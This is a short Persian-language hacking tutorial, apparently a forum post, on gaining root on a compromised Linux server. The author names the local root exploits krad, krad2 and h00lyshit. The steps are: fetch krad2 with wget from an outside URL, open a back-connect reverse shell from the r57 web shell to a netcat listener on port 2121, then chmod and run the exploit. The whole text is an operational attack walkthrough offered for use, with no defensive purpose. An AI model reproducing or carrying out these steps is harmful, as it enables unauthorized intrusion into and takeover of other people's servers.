به داخل فلدر می ریم و می بینیم که 3 تا فایل به نام های krad , krad2 , h00lyshit وجود داره...
همو طور که می دونید این 3 تا لوکال از معروف ترین ها هستند !
h00lyshit هم که در تمامی کرنل ها عمل می کنه ولی یک مشکلی داره که بعدا" در موردش بحث می کنیم
همون طور که مشخص هست و می دونیم بیشتر لوکال اکسپلویت ها به زبان C نوشته شدن که در صورت داشتن پرم می تونید در همون محیط شل
با دستور gcc filename.c -o filename اونو کامپایل کنید !
در این فلدر هم چون هیچ کدوم از فایل ها پسوند ندارن ، پس نتیجه می گیریم که به صورت کامپایل شده هستند !
2 صورت برای آپلود این اکسپلویت ها وجود داره :
1- آپلود شل به صورت معمولی در محیط شل !
2- استفاده از دستور wget !
خوب با دستور wget که بیشتر در موقعی استفاده میشه که ( cb ( Conncet Back گرفتید. و می خواین در همون محیط dos اکسپلویت رو آپلود کنید !
که به صورت زیر است :
wget http://www.rmccurdy.com/scripts/downloaded/localroot/2.6.7/krad2
در پایین شلر r57 یک قسمت به نام :: Net :: و یک زیر مجموعه به نام back-connect داره
دز قسمت اولش ( IP ) آیپی سرور رو نوشته .
در قسمت بعدی ( Port ) پرت رو نوشته که من همیشه پرت 2121 رو برای کانکت بک گرفتن استفاده می کنم
در قسمت بعدیش هم ( Use ) هست که به طور پیشفرض بهتره همون پرل باشه !
حالا ما در کامپیوتر خودمن از قسمت Run به Cmd می ریم و جمله ی زیر رو تایپ می کنیم
nc -vv -l -p 2121
( دقت کنید باید برنامه ی NetCat یا همون NC رو داشته باشید ... )
حالا دوباره به شل بر می گردیم و دکمه ی Connect که در همون قسمت هست رو کلیک می کنیم
بعد از چند لحظه در CMD شما پیغامی مبنی بر کانکت شدن شما به سرور مورد نظر میاد !
و با استفاده از دستور wget ( که در بالا توضیح دادم ) فایل Krad2 رو در پوشه ای که شل در اون است آپلود کنید
برای استفاده از این اکسپلویت ها باید ابتدا به لوکال اکسپلویت پرم 777 بدید ، با دستور :
chmod 777 krad2
وقتی پرم رو دادیم ، باید از دستور : krad/.
استفاده کنیم تا فایل رو اجرا کنه !
بعدش دیگه با خودتون هست ...
یعنی نهوه ی کار کردن با اون اکسپلویت
بیشتر اکسپلویت ها لوکال بعد از اجرا کردن بدون هیچ درد سری ، دسترسی روت رو بهتون می دن !
